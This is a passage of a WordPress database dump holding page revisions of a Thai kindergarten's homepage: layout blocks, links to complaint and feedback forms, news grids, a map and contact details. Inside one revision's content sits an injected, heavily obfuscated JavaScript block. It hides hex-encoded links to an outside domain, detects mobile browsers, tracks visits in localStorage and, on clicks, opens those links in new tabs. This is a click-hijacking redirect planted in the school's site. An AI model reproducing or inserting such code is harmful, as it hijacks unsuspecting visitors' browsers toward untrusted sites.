{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-11-13 11:55:20','2025-11-13 04:55:20','',19,'http://watprato.ssk.in.th/?p=758',0,'revision','',0),
(759,1,'2025-11-13 11:56:31','2025-11-13 04:56:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} 